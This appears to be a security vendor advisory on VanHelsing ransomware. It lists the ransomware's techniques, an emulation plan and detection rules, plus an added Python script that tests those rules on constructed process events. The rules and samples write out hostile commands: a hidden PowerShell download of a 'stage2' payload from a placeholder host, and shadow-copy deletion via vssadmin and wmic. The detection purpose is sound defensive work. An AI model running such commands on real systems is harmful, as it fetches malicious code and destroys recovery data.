
VanHelsing is a ransomware-as-a-service (RaaS) operation that emerged in March 2025, quickly gaining traction within the cybercriminal community for its sophisticated techniques and aggressive targeting. It encrypts victims’ files and demands ransom payments in Bitcoin, using a double extortion model by exfiltrating data before encryption and threatening to leak it if the ransom isn’t paid. VanHelsing is notable for its cross-platform capability, affecting Windows, Linux, BSD, ARM devices, and VMware ESXi environments. The Windows variant is written in C++ and uses the Curve25519 and ChaCha20 algorithms for encryption, appending extensions such as “.vanhelsing” to affected files.
The operation follows a typical RaaS structure, requiring a $5,000 deposit from newcomers to join, with affiliates keeping 80% of ransom payments. Affiliates are provided with a dedicated control panel that allows them to manage attacks, track victims, and monitor payments. VanHelsing also maintains a public leak site where it publishes stolen data from non-paying victims. As of May 14, 2025, the ransomware operation has already infected five victims across the United States, France, Italy, and Australia and has leaked data from three of them.
AttackIQ has released a new attack graph composed of the several Tactics, Techniques and Procedures (TTPs) exhibited by VanHelsing ransomware during its most recent activities, with the aim of helping customers validate their security controls and their ability to defend against this recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against baseline behaviors associated with the VanHelsing ransomware.
- Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
- Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.
[Malware Emulation] VanHelsing Ransomware – 2025-03 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation emulates the sequence of behaviors associated with the deployment of VanHelsing ransomware on a compromised system, including discovery and encryption activities, to provide customers with the opportunity to detect and/or prevent a compromise in progress.
The attack graph is based on behaviors reported by Check Point on March 23, 2025.
Initial Access & Discovery – Local System Reconnaissance
This stage begins with the deployment of VanHelsing ransomware and performs initial reconnaissance. It checks for the presence of a debugger and retrieves locale and system information from the system to avoid infecting unintended victims.
Ingress Tool Transfer (T1105): These two scenarios download the sample to memory and save it to disk, respectively, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario executes the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLCID Windows native API call to retrieve the user default locale ID from the local system.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLocaleName Windows API call to retrieve the user default locale name from the local computer.
System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.
System Information Discovery (T1082): This scenario executes the GetEnvironmentStrings Windows native API call to discover environment variables, usually used to fingerprint the system or search for stored passwords and secrets.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo native API call to retrieve information associated with the system.
Discovery & Impact – VanHelsing Ransomware File Encryption
This stage begins with the deletion of system shadow copies to hinder recovery efforts. It then identifies accessible network shares and drives in order to facilitate lateral movement. Finally, the file system is systematically traversed to identify files of interest, which are subsequently encrypted using a combination of ChaCha20 and Elliptic-curve Diffie–Hellman (ECDH) over Curve25519.
Native API (T1106): This scenario executes the CreateProcessA Windows API call to create a new process of a given executable payload.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Peripheral Device Discovery (T1120): This scenario executes the GetLogicalDriveStringsW Windows native API call to retrieve information about the system’s physical drives.
Peripheral Device Discovery (T1120): This scenario retrieves information about the system’s physical disks using the GetDriveTypeW Windows API call.
Remote System Discovery (T1018): This scenario performs a scan of the local network searching for any remotely accessible systems with port 445 open.
Network Share Discovery (T1135): This scenario executes the net share command to list all network shares in the system.
Modify Registry (T1112): This scenario modifies the registry key HKEY_CURRENT_USER\Control Panel\Desktop to change the desktop wallpaper.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by VanHelsing ransomware.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.
Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PSExec.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Ingress Tool Transfer (T1105):
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
1a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
1b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
2. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
2a. Detection
Deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at command-line activity:
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")
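The two command-line signatures in sections 1a and 2a, run as detection logic over constructed process-creation events. This is an added example, not AttackIQ's or the Security Optimization Platform's own code; the event field names, the case-insensitive substring matching and the sample command lines are assumptions. It goes beyond the page's two rules by adding a third for wmic shadowcopy delete, because the T1490 emulation stage above deletes the shadow copy with that command, which the vssadmin signature alone would not match.

```python
# Added example: evaluates the advisory's T1105 and T1490 command-line
# signatures over constructed process-creation events. Not AttackIQ code.
from dataclasses import dataclass
from typing import List, Set, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed field names, not a real sensor schema)."""
    process_name: str
    command_line: str


@dataclass
class Signature:
    """'Process Name == (...)' gate plus 'Command Line CONTAINS (...)' clauses.

    required_groups is a list of OR-groups; every group must have at least one
    term present in the command line (an AND of ORs), which is the shape of
    (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden").
    """
    name: str
    technique: str
    process_names: Set[str]
    required_groups: List[List[str]]


def matches(sig: Signature, event: ProcessEvent) -> bool:
    # Substring checks are case-insensitive here (an assumption; the advisory
    # does not state how CONTAINS treats case).
    if event.process_name.lower() not in sig.process_names:
        return False
    cmd = event.command_line.lower()
    return all(any(term.lower() in cmd for term in group)
               for group in sig.required_groups)


SIGNATURES = [
    # From the advisory's 1a Detection section.
    Signature("PowerShell hidden DownloadData", "T1105",
              {"cmd.exe", "powershell.exe"},
              [["IWR", "Invoke-WebRequest"], ["DownloadData"], ["Hidden"]]),
    # From the advisory's 2a Detection section.
    Signature("vssadmin Delete Shadows", "T1490",
              {"cmd.exe", "powershell.exe"},
              [["vssadmin"], ["Delete Shadows"]]),
    # Added here, not one of the advisory's rules: the emulation stage deletes
    # the shadow copy with 'wmic shadowcopy delete', which the rule above misses.
    Signature("wmic shadowcopy delete", "T1490",
              {"cmd.exe", "powershell.exe", "wmic.exe"},
              [["wmic"], ["shadowcopy"], ["delete"]]),
]


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Return (technique, signature name, command line) for every hit."""
    return [(sig.technique, sig.name, ev.command_line)
            for ev in events for sig in SIGNATURES if matches(sig, ev)]


# Constructed sample events; hosts and URLs are placeholders, not indicators.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe",
                 'powershell.exe -WindowStyle Hidden -Command "$w = New-Object Net.WebClient; '
                 '$w.DownloadData((IWR https://example.invalid/stage2).Content)"'),
    # Ordinary download without -WindowStyle Hidden or DownloadData: no hit.
    ProcessEvent("powershell.exe",
                 'powershell.exe -Command "Invoke-WebRequest -Uri https://example.invalid/update.json '
                 '-OutFile update.json"'),
    ProcessEvent("cmd.exe", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    ProcessEvent("cmd.exe", "cmd.exe /c wmic shadowcopy delete"),
    # vssadmin started directly (as the CreateProcessA scenario would do) rather
    # than through cmd.exe: the process-name gate keeps the 2a rule from firing.
    ProcessEvent("vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
]

if __name__ == "__main__":
    for technique, name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{technique} {name}: {cmd}")
```

Running the block reports three hits: one T1105 and two T1490. The fifth event is the practitioner's caveat: both advisory rules gate on cmd.exe or powershell.exe, so a vssadmin.exe launched directly by the ransomware binary is not matched by them, and a production rule would also want to inspect the command line of vssadmin.exe and wmic.exe themselves.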
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by VanHelsing ransomware operators. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.